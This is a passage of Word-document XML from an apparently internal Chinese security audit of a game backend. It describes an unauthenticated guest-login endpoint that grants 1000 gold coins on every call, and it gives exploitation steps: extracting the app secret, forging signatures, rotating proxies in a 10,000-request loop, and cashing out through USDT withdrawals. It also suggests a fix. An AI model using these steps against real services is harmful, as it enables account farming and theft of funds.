          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>account.setGoldBalance(BigDecimal.valueOf(1000))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）。结合项目中存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawManage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、"解锁美元全部奖池（UsdtUserConfig）"等涉及真实货币兑换的业务逻辑，金币具有实际货币价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">唯一的防护是基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>request.getRemoteAddr()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 IP 频率限制（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>loginRateLimitService.checkGuestLogin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。该限制存在以下缺陷：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实现代码未在本次上下文中提供，无法确认限制阈值是否足够严格；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者使用住宅代理池、云函数出口 IP 等手段可轻易轮换 IP，有效绕过 IP 维度的速率限制；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做签名校验，但签名所用 </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appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通常内嵌于客户端 App，可被逆向提取后批量构造合法签名请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者可利用上述路径，在短时间内创建大量虚假客态账户，每个账户积累 1000 金币，从而实现金币资产的无限套利。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1103"/>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1104"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者直接请求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /api/user/guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，该路径在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>NO_TOKEN_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单中，完全跳过 Token 鉴权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1105"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对该路径执行签名校验，但 nonce 仅防重放（同一 nonce 不可复用），攻击者每次使用新 nonce 即可通过校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Controller 调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>loginRateLimitService.checkGuestLogin(request.getRemoteAddr())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做 IP 限速，攻击者轮换 IP 可绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1107"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getOrCreateGuestUser()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无条件调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createUser(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，为每次请求创建全新用户并发放 1000 金币，数据持久化至数据库，无法自动撤销。</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入口：UserController.java</w:t>
              <w:br/>
              <w:t>// 接口路径: GET /api/user/guest</w:t>
              <w:br/>
              <w:t>// TokenAuthFilter 白名单路径，无需任何 Token</w:t>
              <w:br/>
              <w:t>@GetMapping("/guest")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;LoginVO&gt; getOrCreateGuest(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    loginRateLimitService.checkGuestLogin(request.getRemoteAddr()); // ← 仅 IP 限速，可通过代理池绕过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userService.getOrCreateGuestUser();                  // ← 污点：每次调用均创建新用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String token = tokenService.generateToken(user.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(new LoginVO(user, token, Boolean.TRUE));</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：UserService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public User getOrCreateGuestUser() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return createUser(1);  // ← 漏洞根因：缺少"get"逻辑，无任何身份复用，永远走"create"分支</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 资产发放：UserService.java createUser()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>protected User createUser(int isNewUser) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = new User();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user = userRepository.save(user);          // ← 每次持久化一条新用户记录</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 新人注册，默认给账户发放1000金币</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = new UserAccount();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUserId(user.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(BigDecimal.valueOf(1000));  // ← 漏洞点：无条件发放 1000 金币</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUsdtBalance(BigDecimal.ZERO);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);              // ← 金币资产持久化至数据库</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 同时创建 UsdtUserConfig（美元奖池解锁记录，涉及真实 USDT 收益）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int lockLevel = 1; lockLevel &lt;= 3; lockLevel++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        UsdtUserConfig cfg = new UsdtUserConfig();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cfg.setUserId(user.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        usdtUserConfigRepository.save(cfg);           // ← 每个账户均获得 USDT 奖池资格</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return user;</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/api/user/guest HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;从客户端App逆向提取的appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;攻击者使用appKey/appSecret自行构造的合法签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;每次请求使用不同的随机nonce&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Type: application/json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>批量脚本逻辑（伪代码）：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for i in range(10000):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    nonce = random_uuid()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    timestamp = current_timestamp()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sign = compute_sign(appKey, appSecret, timestamp, nonce, path="/api/user/guest")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = GET /api/user/guest with headers(sign, timestamp, nonce)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 每次响应返回新 userId + token，对应账户含 1000 金币</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 如果触发 IP 限速，切换代理 IP 继续</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    collect(response.token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">逆向客户端 App（APK/IPA）提取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（或通过抓包观察合法请求特征，尝试推断签名算法）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用代理 IP 池（住宅代理或云函数），循环发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /api/user/guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，每次携带新 nonce、新时间戳和对应合法签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每次请求成功后获得新用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，对应账户内含 1000 金币初始余额，同时获得 USDT 奖池解锁资格（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UsdtUserConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">利用收集到的大量账户，通过游戏内金币兑换、奖池提取等业务路径将金币变现为 USDT，再经 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相关提现接口提取真实资金。</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：每次 API 调用均在数据库中生成一条独立用户记录和对应的 1000 金币资产，攻击者可积累海量账户资产后批量套现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1112"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 Token 白名单中，无需鉴权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>完全未授权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；唯一门槛为签名过滤器，但其 </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appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通常内嵌于客户端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复建议方向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅供参考，不作为漏洞判断依据）：需在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getOrCreateGuestUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中引入设备指纹、设备 ID 或持久化 Cookie 与账户的绑定关系，实现真正的"get or create"语义，确保同一设备的客态请求复用同一账户而非无限创建新账户。</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114"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserController.java.getOrCreateGuest → UserService.java.getOrCreateGuestUser → UserService.java.createUser → UserService.java.recordLogin</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audit_m240_920_getOrCreateGuest_ctrl-path1of20.md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：UserService.java#consumeAuthCodeOnce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_53" w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞52：AuthCode 一次性保护 Redis 空指针静默绕过导致重复账号创建与金币套取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="111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：AuthCode 一次性消费保护 Redis Null 静默绕过 + TOCTOU 竞态，可触发重复账号创建并套取初始金币</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="111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src/main/java/com/gameBack/mjservice/service/UserService.java:consumeAuthCodeOnce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
